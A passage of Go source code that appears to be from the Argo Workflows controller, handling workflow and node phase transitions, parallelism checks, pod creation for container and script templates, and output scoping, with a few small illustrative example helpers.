if prevNodeStatus, ok := woc.preExecutionNodePhases[node.ID]; (!ok || !prevNodeStatus.Fulfilled()) && node.Fulfilled() {
localScope, realTimeScope := woc.prepareMetricScope(node)
woc.computeMetrics(processedTmpl.Metrics.Prometheus, localScope, realTimeScope, false)
}
}
node = woc.wf.GetNodeByName(node.Name)
// Swap the node back to retry node
if retryNodeName != "" {
retryNode := woc.wf.GetNodeByName(retryNodeName)
if !retryNode.Fulfilled() && node.Fulfilled() { // if the retry child has completed, we need to update the retry node itself
retryNode, err = woc.executeTemplate(ctx, retryNodeName, orgTmpl, tmplCtx, args, opts)
if err != nil {
return woc.markNodeError(node.Name, err), err
}
}
node = retryNode
}
return node, nil
}
// Checks if the template has exceeded its deadline
func (woc *wfOperationCtx) checkTemplateTimeout(tmpl *wfv1.Template, node *wfv1.NodeStatus) (*time.Time, error) {
if node == nil {
return nil, nil
}
if tmpl.Timeout != "" {
tmplTimeout, err := time.ParseDuration(tmpl.Timeout)
if err != nil {
return nil, fmt.Errorf("invalid timeout format. %v", err)
}
deadline := node.StartedAt.Add(tmplTimeout)
if node.Phase == wfv1.NodePending && time.Now().After(deadline) {
return nil, ErrTimeout
}
return &deadline, nil
}
return nil, nil
}
// markWorkflowPhase is a convenience method to set the phase of the workflow with optional message
// optionally marks the workflow completed, which sets the finishedAt timestamp and completed label
func (woc *wfOperationCtx) markWorkflowPhase(ctx context.Context, phase wfv1.WorkflowPhase, message string) {
markCompleted := false
if woc.wf.Status.Phase != phase {
if woc.wf.Status.Fulfilled() {
woc.log.WithFields(log.Fields{"fromPhase": woc.wf.Status.Phase, "toPhase": phase}).
Panic("workflow is already fulfilled")
}
woc.log.Infof("Updated phase %s -> %s", woc.wf.Status.Phase, phase)
woc.updated = true
woc.wf.Status.Phase = phase
if woc.wf.ObjectMeta.Labels == nil {
woc.wf.ObjectMeta.Labels = make(map[string]string)
}
woc.wf.ObjectMeta.Labels[common.LabelKeyPhase] = string(phase)
switch phase {
case wfv1.WorkflowRunning:
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeNormal, "WorkflowRunning", "Workflow Running")
case wfv1.WorkflowSucceeded:
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeNormal, "WorkflowSucceeded", "Workflow completed")
case wfv1.WorkflowFailed, wfv1.WorkflowError:
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeWarning, "WorkflowFailed", message)
}
markCompleted = phase.Completed()
}
if woc.wf.Status.StartedAt.IsZero() && phase != wfv1.WorkflowPending {
woc.updated = true
woc.wf.Status.StartedAt = metav1.Time{Time: time.Now().UTC()}
woc.wf.Status.EstimatedDuration = woc.estimateWorkflowDuration()
}
if woc.wf.Status.Message != message {
woc.log.Infof("Updated message %s -> %s", woc.wf.Status.Message, message)
woc.updated = true
woc.wf.Status.Message = message
}
if phase == wfv1.WorkflowError {
entryNode, ok := woc.wf.Status.Nodes[woc.wf.ObjectMeta.Name]
if ok && entryNode.Phase == wfv1.NodeRunning {
entryNode.Phase = wfv1.NodeError
entryNode.Message = "Workflow operation error"
woc.wf.Status.Nodes[woc.wf.ObjectMeta.Name] = entryNode
woc.updated = true
}
}
switch phase {
case wfv1.WorkflowSucceeded, wfv1.WorkflowFailed, wfv1.WorkflowError:
// wait for all daemon nodes to get terminated before marking workflow completed
if markCompleted && !woc.hasDaemonNodes() {
woc.log.Infof("Marking workflow completed")
woc.wf.Status.FinishedAt = metav1.Time{Time: time.Now().UTC()}
woc.globalParams[common.GlobalVarWorkflowDuration] = fmt.Sprintf("%f", woc.wf.Status.FinishedAt.Sub(woc.wf.Status.StartedAt.Time).Seconds())
if woc.wf.ObjectMeta.Labels == nil {
woc.wf.ObjectMeta.Labels = make(map[string]string)
}
woc.wf.ObjectMeta.Labels[common.LabelKeyCompleted] = "true"
woc.wf.Status.Conditions.UpsertCondition(wfv1.Condition{Status: metav1.ConditionTrue, Type: wfv1.ConditionTypeCompleted})
err := woc.deletePDBResource(ctx)
if err != nil {
woc.wf.Status.Phase = wfv1.WorkflowError
woc.wf.ObjectMeta.Labels[common.LabelKeyPhase] = string(wfv1.NodeError)
woc.updated = true
woc.wf.Status.Message = err.Error()
}
if woc.controller.wfArchive.IsEnabled() {
if woc.controller.isArchivable(woc.wf) {
woc.log.Infof("Marking workflow as pending archiving")
woc.wf.Labels[common.LabelKeyWorkflowArchivingStatus] = "Pending"
} else {
woc.log.Infof("Doesn't match with archive label selector. Skipping Archive")
}
}
woc.updated = true
}
}
}
// getEstimator returns a duration estimator; this may be a null implementation in the rare case of an error
func (woc *wfOperationCtx) getEstimator() estimation.Estimator {
if woc.estimator == nil {
woc.estimator, _ = woc.controller.estimatorFactory.NewEstimator(woc.wf)
}
return woc.estimator
}
func (woc *wfOperationCtx) estimateWorkflowDuration() wfv1.EstimatedDuration {
return woc.getEstimator().EstimateWorkflowDuration()
}
func (woc *wfOperationCtx) estimateNodeDuration(nodeName string) wfv1.EstimatedDuration {
return woc.getEstimator().EstimateNodeDuration(nodeName)
}
func (woc *wfOperationCtx) hasDaemonNodes() bool {
for _, node := range woc.wf.Status.Nodes {
if node.IsDaemoned() {
return true
}
}
return false
}
func (woc *wfOperationCtx) findTemplate(pod *apiv1.Pod) *wfv1.Template {
nodeName := pod.Annotations[common.AnnotationKeyNodeName]
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
return nil // I don't expect this to happen in production, just in tests
}
return woc.wf.GetTemplateByName(node.TemplateName)
}
func (woc *wfOperationCtx) markWorkflowRunning(ctx context.Context) {
woc.markWorkflowPhase(ctx, wfv1.WorkflowRunning, "")
}
func (woc *wfOperationCtx) markWorkflowSuccess(ctx context.Context) {
woc.markWorkflowPhase(ctx, wfv1.WorkflowSucceeded, "")
}
func (woc *wfOperationCtx) markWorkflowFailed(ctx context.Context, message string) {
woc.markWorkflowPhase(ctx, wfv1.WorkflowFailed, message)
}
func (woc *wfOperationCtx) markWorkflowError(ctx context.Context, err error) {
woc.markWorkflowPhase(ctx, wfv1.WorkflowError, err.Error())
}
// stepsOrDagSeparator identifies if a node name starts with our naming convention separator from
// DAG or steps templates. It matches strings with a prefix like "[0]." or "."
var stepsOrDagSeparator = regexp.MustCompile(`^(\[\d+\])?\.`)
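// exampleStepsOrDagSeparator is an illustrative sketch only (not called by the controller)
// showing which display-name prefixes the regex strips; the inputs are assumptions for
// demonstration purposes.
func exampleStepsOrDagSeparator() {
	fmt.Println(stepsOrDagSeparator.ReplaceAllString("[0].generate", "")) // generate
	fmt.Println(stepsOrDagSeparator.ReplaceAllString(".generate", ""))    // generate
}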
// initializeExecutableNode initializes a node and stores the template.
func (woc *wfOperationCtx) initializeExecutableNode(nodeName string, nodeType wfv1.NodeType, templateScope string, executeTmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, phase wfv1.NodePhase, messages ...string) *wfv1.NodeStatus {
node := woc.initializeNode(nodeName, nodeType, templateScope, orgTmpl, boundaryID, phase)
// Set the input values to the node.
if executeTmpl.Inputs.HasInputs() {
node.Inputs = executeTmpl.Inputs.DeepCopy()
}
if nodeType == wfv1.NodeTypeSuspend {
node = addRawOutputFields(node, executeTmpl)
}
if len(messages) > 0 {
node.Message = messages[0]
}
// Update the node
woc.wf.Status.Nodes[node.ID] = *node
woc.updated = true
return node
}
// initializeNodeOrMarkError initializes an error node, or marks the node as errored if it already exists.
func (woc *wfOperationCtx) initializeNodeOrMarkError(node *wfv1.NodeStatus, nodeName string, templateScope string, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, err error) *wfv1.NodeStatus {
if node != nil {
return woc.markNodeError(nodeName, err)
}
return woc.initializeNode(nodeName, wfv1.NodeTypeSkipped, templateScope, orgTmpl, boundaryID, wfv1.NodeError, err.Error())
}
// Creates a node status that is or will be cached
func (woc *wfOperationCtx) initializeCacheNode(nodeName string, resolvedTmpl *wfv1.Template, templateScope string, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, memStat *wfv1.MemoizationStatus, messages ...string) *wfv1.NodeStatus {
if resolvedTmpl.Memoize == nil {
err := fmt.Errorf("cannot initialize a cached node from a non-memoized template")
woc.log.WithFields(log.Fields{"namespace": woc.wf.Namespace, "wfName": woc.wf.Name}).WithError(err).Error("cannot initialize cached node")
panic(err)
}
woc.log.Debug("Initializing cached node ", nodeName, common.GetTemplateHolderString(orgTmpl), boundaryID)
node := woc.initializeExecutableNode(nodeName, wfutil.GetNodeType(resolvedTmpl), templateScope, resolvedTmpl, orgTmpl, boundaryID, wfv1.NodePending, messages...)
node.MemoizationStatus = memStat
return node
}
// Creates a node status that has been cached, completely initialized, and marked as finished
func (woc *wfOperationCtx) initializeCacheHitNode(nodeName string, resolvedTmpl *wfv1.Template, templateScope string, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, outputs *wfv1.Outputs, memStat *wfv1.MemoizationStatus, messages ...string) *wfv1.NodeStatus {
node := woc.initializeCacheNode(nodeName, resolvedTmpl, templateScope, orgTmpl, boundaryID, memStat, messages...)
node.Phase = wfv1.NodeSucceeded
node.Outputs = outputs
node.FinishedAt = metav1.Time{Time: time.Now().UTC()}
return node
}
func (woc *wfOperationCtx) initializeNode(nodeName string, nodeType wfv1.NodeType, templateScope string, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, phase wfv1.NodePhase, messages ...string) *wfv1.NodeStatus {
woc.log.Debugf("Initializing node %s: template: %s, boundaryID: %s", nodeName, common.GetTemplateHolderString(orgTmpl), boundaryID)
nodeID := woc.wf.NodeID(nodeName)
_, ok := woc.wf.Status.Nodes[nodeID]
if ok {
panic(fmt.Sprintf("node %s already initialized", nodeName))
}
node := wfv1.NodeStatus{
ID: nodeID,
Name: nodeName,
TemplateName: orgTmpl.GetTemplateName(),
TemplateRef: orgTmpl.GetTemplateRef(),
TemplateScope: templateScope,
Type: nodeType,
BoundaryID: boundaryID,
Phase: phase,
StartedAt: metav1.Time{Time: time.Now().UTC()},
EstimatedDuration: woc.estimateNodeDuration(nodeName),
}
if boundaryNode, ok := woc.wf.Status.Nodes[boundaryID]; ok {
node.DisplayName = strings.TrimPrefix(node.Name, boundaryNode.Name)
if stepsOrDagSeparator.MatchString(node.DisplayName) {
node.DisplayName = stepsOrDagSeparator.ReplaceAllString(node.DisplayName, "")
}
} else {
node.DisplayName = nodeName
}
if node.Fulfilled() && node.FinishedAt.IsZero() {
node.FinishedAt = node.StartedAt
}
var message string
if len(messages) > 0 {
message = fmt.Sprintf(" (message: %s)", messages[0])
node.Message = messages[0]
}
woc.wf.Status.Nodes[nodeID] = node
woc.log.Infof("%s node %v initialized %s%s", node.Type, node.ID, node.Phase, message)
woc.updated = true
return &node
}
// markNodePhase marks a node with the given phase and handles timestamps; it panics if the node has not been initialized
func (woc *wfOperationCtx) markNodePhase(nodeName string, phase wfv1.NodePhase, message ...string) *wfv1.NodeStatus {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
panic(fmt.Sprintf("workflow '%s' node '%s' uninitialized when marking as %v: %s", woc.wf.Name, nodeName, phase, message))
}
if node.Phase != phase {
if node.Phase.Fulfilled() {
woc.log.WithFields(log.Fields{"nodeName": node.Name, "fromPhase": node.Phase, "toPhase": phase}).
Error("node is already fulfilled")
}
woc.log.Infof("node %s phase %s -> %s", node.ID, node.Phase, phase)
node.Phase = phase
woc.updated = true
}
if len(message) > 0 {
if message[0] != node.Message {
woc.log.Infof("node %s message: %s", node.ID, message[0])
node.Message = message[0]
woc.updated = true
}
}
if node.Fulfilled() && node.FinishedAt.IsZero() {
node.FinishedAt = metav1.Time{Time: time.Now().UTC()}
woc.log.Infof("node %s finished: %s", node.ID, node.FinishedAt)
woc.updated = true
}
woc.wf.Status.Nodes[node.ID] = *node
return node
}
func (woc *wfOperationCtx) recordNodePhaseEvent(node *wfv1.NodeStatus) {
message := fmt.Sprintf("%v node %s", node.Phase, node.Name)
if node.Message != "" {
message = message + ": " + node.Message
}
eventType := apiv1.EventTypeWarning
switch node.Phase {
case wfv1.NodeSucceeded, wfv1.NodeRunning:
eventType = apiv1.EventTypeNormal
}
woc.eventRecorder.AnnotatedEventf(
woc.wf,
map[string]string{
common.AnnotationKeyNodeType: string(node.Type),
common.AnnotationKeyNodeName: node.Name,
},
eventType,
fmt.Sprintf("WorkflowNode%s", node.Phase),
message,
)
}
// recordNodePhaseChangeEvents creates WorkflowNode Kubernetes events for each node
// that has changes logged during this execution of the operator loop.
func (woc *wfOperationCtx) recordNodePhaseChangeEvents(old wfv1.Nodes, new wfv1.Nodes) {
if !woc.controller.Config.NodeEvents.IsEnabled() {
return
}
// Send events for nodes whose phase changed during this execution, as well as for newly added nodes
for nodeName, newNode := range new {
oldNode, exists := old[nodeName]
if exists {
if oldNode.Phase == newNode.Phase {
continue
}
if oldNode.Phase == wfv1.NodePending && newNode.Completed() {
ephemeralNode := newNode.DeepCopy()
ephemeralNode.Phase = wfv1.NodeRunning
woc.recordNodePhaseEvent(ephemeralNode)
}
woc.recordNodePhaseEvent(&newNode)
} else {
if newNode.Phase == wfv1.NodeRunning {
woc.recordNodePhaseEvent(&newNode)
} else if newNode.Completed() {
ephemeralNode := newNode.DeepCopy()
ephemeralNode.Phase = wfv1.NodeRunning
woc.recordNodePhaseEvent(ephemeralNode)
woc.recordNodePhaseEvent(&newNode)
}
}
}
}
// markNodeError is a convenience method to mark a node with an error and set the message from the error
func (woc *wfOperationCtx) markNodeError(nodeName string, err error) *wfv1.NodeStatus {
woc.log.WithError(err).WithField("nodeName", nodeName).Error("Mark error node")
return woc.markNodePhase(nodeName, wfv1.NodeError, err.Error())
}
// markNodePending is a convenience method to mark a node as Pending and set the message from the error
func (woc *wfOperationCtx) markNodePending(nodeName string, err error) *wfv1.NodeStatus {
woc.log.Infof("Mark node %s as Pending, due to: %v", nodeName, err)
return woc.markNodePhase(nodeName, wfv1.NodePending, err.Error()) // this error message will not change often
}
// markNodeWaitingForLock is a convenience method to mark that a node is waiting for a lock
func (woc *wfOperationCtx) markNodeWaitingForLock(nodeName string, lockName string) *wfv1.NodeStatus {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
return node
}
if node.SynchronizationStatus == nil {
node.SynchronizationStatus = &wfv1.NodeSynchronizationStatus{}
}
if lockName == "" {
// If we are no longer waiting for a lock, nil out the sync status
node.SynchronizationStatus = nil
} else {
node.SynchronizationStatus.Waiting = lockName
}
woc.wf.Status.Nodes[node.ID] = *node
woc.updated = true
return node
}
// checkParallelism checks if the given template is able to be executed, considering the current active pods and workflow/template parallelism
func (woc *wfOperationCtx) checkParallelism(tmpl *wfv1.Template, node *wfv1.NodeStatus, boundaryID string) error {
if woc.execWf.Spec.Parallelism != nil && woc.activePods >= *woc.execWf.Spec.Parallelism {
woc.log.Infof("workflow active pod spec parallelism reached %d/%d", woc.activePods, *woc.execWf.Spec.Parallelism)
return ErrParallelismReached
}
// If we are a DAG or Steps template, check if we have active pods or unsuccessful children
if node != nil && (tmpl.GetType() == wfv1.TemplateTypeDAG || tmpl.GetType() == wfv1.TemplateTypeSteps) {
// Check failFast
if tmpl.IsFailFast() && woc.getUnsuccessfulChildren(node.ID) > 0 {
woc.markNodePhase(node.Name, wfv1.NodeFailed, "template has failed or errored children and failFast enabled")
return ErrParallelismReached
}
// Check parallelism
if tmpl.HasParallelism() && woc.getActivePods(node.ID) >= *tmpl.Parallelism {
woc.log.Infof("template (node %s) active children parallelism exceeded %d", node.ID, *tmpl.Parallelism)
return ErrParallelismReached
}
}
// if we are about to execute a pod, make sure our parent hasn't reached its limit
if boundaryID != "" && (node == nil || (node.Phase != wfv1.NodePending && node.Phase != wfv1.NodeRunning)) {
boundaryNode, ok := woc.wf.Status.Nodes[boundaryID]
if !ok {
return errors.InternalError("boundaryNode not found")
}
tmplCtx, err := woc.createTemplateContext(boundaryNode.GetTemplateScope())
if err != nil {
return err
}
_, boundaryTemplate, templateStored, err := tmplCtx.ResolveTemplate(&boundaryNode)
if err != nil {
return err
}
// A new template was stored during resolution, persist it
if templateStored {
woc.updated = true
}
// Check failFast
if boundaryTemplate.IsFailFast() && woc.getUnsuccessfulChildren(boundaryID) > 0 {
woc.markNodePhase(boundaryNode.Name, wfv1.NodeFailed, "template has failed or errored children and failFast enabled")
return ErrParallelismReached
}
// Check parallelism
if boundaryTemplate.HasParallelism() && woc.getActiveChildren(boundaryID) >= *boundaryTemplate.Parallelism {
woc.log.Infof("template (node %s) active children parallelism exceeded %d", boundaryID, *boundaryTemplate.Parallelism)
return ErrParallelismReached
}
}
return nil
}
func (woc *wfOperationCtx) executeContainer(ctx context.Context, nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypePod, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
}
// Check if the output of this container is referenced elsewhere in the Workflow. If so, make sure to include it during
// execution.
includeScriptOutput, err := woc.includeScriptOutput(nodeName, opts.boundaryID)
if err != nil {
return node, err
}
woc.log.Debugf("Executing node %s with container template: %v\n", nodeName, tmpl.Name)
_, err = woc.createWorkflowPod(ctx, nodeName, []apiv1.Container{*tmpl.Container}, tmpl, &createWorkflowPodOpts{
includeScriptOutput: includeScriptOutput,
onExitPod: opts.onExitTemplate,
executionDeadline: opts.executionDeadline,
})
if err != nil {
return woc.requeueIfTransientErr(err, node.Name)
}
return node, err
}
func (woc *wfOperationCtx) getOutboundNodes(nodeID string) []string {
node := woc.wf.Status.Nodes[nodeID]
switch node.Type {
case wfv1.NodeTypeSkipped, wfv1.NodeTypeSuspend:
return []string{node.ID}
case wfv1.NodeTypeContainer, wfv1.NodeTypePod, wfv1.NodeTypeTaskGroup:
if len(node.Children) == 0 {
return []string{node.ID}
}
outboundNodes := make([]string, 0)
for _, child := range node.Children {
outboundNodes = append(outboundNodes, woc.getOutboundNodes(child)...)
}
return outboundNodes
case wfv1.NodeTypeRetry:
numChildren := len(node.Children)
if numChildren > 0 {
return []string{node.Children[numChildren-1]}
}
}
outbound := make([]string, 0)
for _, outboundNodeID := range node.OutboundNodes {
outbound = append(outbound, woc.getOutboundNodes(outboundNodeID)...)
}
return outbound
}
// getTemplateOutputsFromScope resolves a template's outputs from the scope of the template
func getTemplateOutputsFromScope(tmpl *wfv1.Template, scope *wfScope) (*wfv1.Outputs, error) {
if !tmpl.Outputs.HasOutputs() {
return nil, nil
}
var outputs wfv1.Outputs
if len(tmpl.Outputs.Parameters) > 0 {
outputs.Parameters = make([]wfv1.Parameter, 0)
for _, param := range tmpl.Outputs.Parameters {
if param.ValueFrom == nil {
return nil, fmt.Errorf("output parameters must have a valueFrom specified")
}
val, err := scope.resolveParameter(param.ValueFrom)
if err != nil {
// We have a default value to use instead of returning an error
if param.ValueFrom.Default != nil {
val = param.ValueFrom.Default.String()
} else {
return nil, err
}
}
param.Value = wfv1.AnyStringPtr(val)
param.ValueFrom = nil
outputs.Parameters = append(outputs.Parameters, param)
}
}
if len(tmpl.Outputs.Artifacts) > 0 {
outputs.Artifacts = make([]wfv1.Artifact, 0)
for _, art := range tmpl.Outputs.Artifacts {
resolvedArt, err := scope.resolveArtifact(&art)
if err != nil {
// If the artifact was not found and is optional, don't mark an error
if strings.Contains(err.Error(), "Unable to resolve") && art.Optional {
log.Warnf("Optional artifact '%s' was not found; it won't be available as an output", art.Name)
continue
}
return nil, fmt.Errorf("unable to resolve outputs from scope: %s", err)
}
resolvedArt.Name = art.Name
outputs.Artifacts = append(outputs.Artifacts, *resolvedArt)
}
}
return &outputs, nil
}
func generateOutputResultRegex(name string, parentTmpl *wfv1.Template) (string, string) {
referenceRegex := fmt.Sprintf(`\.%s\.outputs\.result`, name)
expressionRegex := fmt.Sprintf(`\[['\"]%s['\"]\]\.outputs.result`, name)
if parentTmpl.DAG != nil {
referenceRegex = "tasks" + referenceRegex
expressionRegex = "tasks" + expressionRegex
} else if parentTmpl.Steps != nil {
referenceRegex = "steps" + referenceRegex
expressionRegex = "steps" + expressionRegex
}
return referenceRegex, expressionRegex
}
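// exampleGenerateOutputResultRegex is an illustrative sketch only (not called by the
// controller) showing the two patterns produced for a DAG parent template; the task name
// "generate" is an assumption for demonstration purposes.
func exampleGenerateOutputResultRegex() {
	parent := &wfv1.Template{DAG: &wfv1.DAGTemplate{}}
	ref, expr := generateOutputResultRegex("generate", parent)
	// Both patterns are prefixed with "tasks" because the parent is a DAG template:
	// ref matches {{tasks.generate.outputs.result}} style references,
	// expr matches tasks['generate'].outputs.result style expressions.
	fmt.Println(ref, expr)
}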
// hasOutputResultRef checks whether the given template's output result is referenced anywhere in the parent template
func hasOutputResultRef(name string, parentTmpl *wfv1.Template) bool {
jsonValue, err := json.Marshal(parentTmpl)
if err != nil {
log.Warnf("Unable to marshal template %q: %v", parentTmpl, err)
}
// First consider usual case (e.g.: `value: "{{steps.generate.outputs.result}}"`)
// This is most common, so should be done first.
referenceRegex, expressionRegex := generateOutputResultRegex(name, parentTmpl)
contains, err := regexp.MatchString(referenceRegex, string(jsonValue))
if err != nil {
log.Warnf("Error in regex compilation %q: %v", referenceRegex, err)
}
if contains {
return true
}
// Next, consider expression case (e.g.: `expression: "steps['generate-random-1'].outputs.result"`)
contains, err = regexp.MatchString(expressionRegex, string(jsonValue))
if err != nil {
log.Warnf("Error in regex compilation %q: %v", expressionRegex, err)
}
return contains
}
// getStepOrDAGTaskName extracts the step or task name from a NodeStatus name
func getStepOrDAGTaskName(nodeName string) string {
// Extract the task or step name by ignoring retry IDs and expanded IDs that are included in parenthesis at the end
// of a node. Example: ".fanout1(0:1)(0)[0]" -> "fanout1"
// Opener is what opened our current parenthesis. Example: if we see a ")", our opener is a "("
opener := ""
loop:
for i := len(nodeName) - 1; i >= 0; i-- {
char := string(nodeName[i])
switch {
case char == opener:
// If we find the opener, we are no longer inside a parenthesis or bracket
opener = ""
case opener != "":
// If the opener is not empty, then we are inside a parenthesis or bracket
// Do nothing
case char == ")":
// We are going inside a parenthesis
opener = "("
case char == "]":
// We are going inside a bracket
opener = "["
default:
// If the current character is not a parenthesis or bracket, and we are not inside one already, we have found
// the end of the node name.
nodeName = nodeName[:i+1]
break loop
}
}
// If our node contains a dot, we're a child node. We're only interested in the step that called us, so return the
// name of the node after the last dot.
if lastDotIndex := strings.LastIndex(nodeName, "."); lastDotIndex >= 0 {
nodeName = nodeName[lastDotIndex+1:]
}
return nodeName
}
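// exampleGetStepOrDAGTaskName is an illustrative sketch only (not called by the controller)
// showing how retry/expansion suffixes and parent prefixes are stripped; the node names are
// assumptions for demonstration purposes.
func exampleGetStepOrDAGTaskName() {
	fmt.Println(getStepOrDAGTaskName("my-wf.fanout1(0:1)(0)[0]")) // fanout1
	fmt.Println(getStepOrDAGTaskName("my-wf[0].build"))           // build
}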
func (woc *wfOperationCtx) executeScript(ctx context.Context, nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypePod, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
} else if !node.Pending() {
return node, nil
}
// Check if the output of this script is referenced elsewhere in the Workflow. If so, make sure to include it during
// execution.
includeScriptOutput, err := woc.includeScriptOutput(nodeName, opts.boundaryID)
if err != nil {
return node, err
}
mainCtr := tmpl.Script.Container
mainCtr.Args = append(mainCtr.Args, common.ExecutorScriptSourcePath)
_, err = woc.createWorkflowPod(ctx, nodeName, []apiv1.Container{mainCtr}, tmpl, &createWorkflowPodOpts{
includeScriptOutput: includeScriptOutput,
onExitPod: opts.onExitTemplate,
executionDeadline: opts.executionDeadline,
})
if err != nil {
return woc.requeueIfTransientErr(err, node.Name)
}
return node, err
}
func (woc *wfOperationCtx) requeueIfTransientErr(err error, nodeName string) (*wfv1.NodeStatus, error) {
if errorsutil.IsTransientErr(err) || err == ErrResourceRateLimitReached {
// Our error was most likely caused by a lack of resources.
woc.requeue()
return woc.markNodePending(nodeName, err), nil
}
return nil, err
}
// buildLocalScope adds all of a node's outputs to the local scope with the given prefix, as well
// as the global scope, if specified with a globalName
func (woc *wfOperationCtx) buildLocalScope(scope *wfScope, prefix string, node *wfv1.NodeStatus) {
// It may be that the node is a retry node, in which case we want to get the outputs of the last node
// in the retry group instead of the retry node itself.
if node.Type == wfv1.NodeTypeRetry {
node = getChildNodeIndex(node, woc.wf.Status.Nodes, -1)
}
if node.ID != "" {
key := fmt.Sprintf("%s.id", prefix)
scope.addParamToScope(key, node.ID)
}
if !node.StartedAt.Time.IsZero() {
key := fmt.Sprintf("%s.startedAt", prefix)
scope.addParamToScope(key, node.StartedAt.Time.Format(time.RFC3339))
}
if !node.FinishedAt.Time.IsZero() {
key := fmt.Sprintf("%s.finishedAt", prefix)
scope.addParamToScope(key, node.FinishedAt.Time.Format(time.RFC3339))
}
if node.PodIP != "" {
key := fmt.Sprintf("%s.ip", prefix)
scope.addParamToScope(key, node.PodIP)
}
if node.Phase != "" {
key := fmt.Sprintf("%s.status", prefix)
scope.addParamToScope(key, string(node.Phase))
}
woc.addOutputsToLocalScope(prefix, node.Outputs, scope)
}
func (woc *wfOperationCtx) addOutputsToLocalScope(prefix string, outputs *wfv1.Outputs, scope *wfScope) {
if outputs == nil || scope == nil {
return
}
if prefix != "workflow" && outputs.Result != nil {
scope.addParamToScope(fmt.Sprintf("%s.outputs.result", prefix), *outputs.Result)
}
if prefix != "workflow" && outputs.ExitCode != nil {
scope.addParamToScope(fmt.Sprintf("%s.exitCode", prefix), *outputs.ExitCode)
}
for _, param := range outputs.Parameters {
if param.Value != nil {
scope.addParamToScope(fmt.Sprintf("%s.outputs.parameters.%s", prefix, param.Name), param.Value.String())
}
}
for _, art := range outputs.Artifacts {
scope.addArtifactToScope(fmt.Sprintf("%s.outputs.artifacts.%s", prefix, art.Name), art)
}
}
func (woc *wfOperationCtx) addOutputsToGlobalScope(outputs *wfv1.Outputs) {
if outputs == nil {
return
}
for _, param := range outputs.Parameters {
woc.addParamToGlobalScope(param)
}
for _, art := range outputs.Artifacts {
woc.addArtifactToGlobalScope(art)
}
}
// loopNodes is a node list which supports sorting by loop index
type loopNodes []wfv1.NodeStatus
func (n loopNodes) Len() int {
return len(n)
}
func parseLoopIndex(s string) int {
s = strings.SplitN(s, "(", 2)[1]
s = strings.SplitN(s, ":", 2)[0]
val, err := strconv.Atoi(s)
if err != nil {
panic(fmt.Sprintf("failed to parse '%s' as int: %v", s, err))
}
return val
}
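// exampleParseLoopIndex is an illustrative sketch only (not called by the controller) showing
// how the loop index is recovered from an expanded node's display name; the display name is
// an assumption for demonstration purposes.
func exampleParseLoopIndex() {
	fmt.Println(parseLoopIndex("fanout(2:foo)")) // 2
}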
func (n loopNodes) Less(i, j int) bool {
left := parseLoopIndex(n[i].DisplayName)
right := parseLoopIndex(n[j].DisplayName)
return left < right
}
func (n loopNodes) Swap(i, j int) {
n[i], n[j] = n[j], n[i]
}
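// exampleLoopNodesSort is an illustrative sketch only (not called by the controller) showing
// that expanded children sort by loop index rather than lexically; the display names are
// assumptions for demonstration purposes.
func exampleLoopNodesSort() {
	children := loopNodes{
		{DisplayName: "step(10:z)"},
		{DisplayName: "step(2:a)"},
	}
	sort.Sort(children)
	fmt.Println(children[0].DisplayName) // step(2:a)
}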
// processAggregateNodeOutputs adds the aggregated outputs of a withItems/withParam template as a
// parameter in the form of a JSON list
func (woc *wfOperationCtx) processAggregateNodeOutputs(tmpl *wfv1.Template, scope *wfScope, prefix string, childNodes []wfv1.NodeStatus) error {
if len(childNodes) == 0 {
return nil
}
// need to sort the child node list so that the order of outputs is preserved
sort.Sort(loopNodes(childNodes))
paramList := make([]map[string]string, 0)
outputParamValueLists := make(map[string][]string)
resultsList := make([]wfv1.Item, 0)
for _, node := range childNodes {
if node.Outputs == nil {
continue
}
if len(node.Outputs.Parameters) > 0 {
param := make(map[string]string)
for _, p := range node.Outputs.Parameters {
param[p.Name] = p.Value.String()
outputParamValueList := outputParamValueLists[p.Name]
outputParamValueList = append(outputParamValueList, p.Value.String())
outputParamValueLists[p.Name] = outputParamValueList
}
paramList = append(paramList, param)
}
if node.Outputs.Result != nil {
// Support the case where item may be a map
var item wfv1.Item
err := json.Unmarshal([]byte(*node.Outputs.Result), &item)
if err != nil {
return err
}
resultsList = append(resultsList, item)
}
}
if tmpl.GetType() == wfv1.TemplateTypeScript {
resultsJSON, err := json.Marshal(resultsList)
if err != nil {
return err
}
key := fmt.Sprintf("%s.outputs.result", prefix)
scope.addParamToScope(key, string(resultsJSON))
}
outputsJSON, err := json.Marshal(paramList)
if err != nil {
return err
}
key := fmt.Sprintf("%s.outputs.parameters", prefix)
scope.addParamToScope(key, string(outputsJSON))
// Adding per-output aggregated value placeholders
for outputName, valueList := range outputParamValueLists {
key = fmt.Sprintf("%s.outputs.parameters.%s", prefix, outputName)
valueListJSON, err := json.Marshal(valueList)
if err != nil {
return err
}
scope.addParamToScope(key, string(valueListJSON))
}
return nil
}
// addParamToGlobalScope exports any desired node outputs to the global scope, and adds it to the global outputs.
func (woc *wfOperationCtx) addParamToGlobalScope(param wfv1.Parameter) {
if param.GlobalName == "" {
return
}
paramName := fmt.Sprintf("workflow.outputs.parameters.%s", param.GlobalName)
if param.HasValue() {
woc.globalParams[paramName] = param.GetValue()
}
wfUpdated := wfutil.AddParamToGlobalScope(woc.wf, woc.log, param)
if wfUpdated {
woc.updated = true
}
}
// addArtifactToGlobalScope exports any desired node outputs to the global scope
// Optionally adds to a local scope if supplied
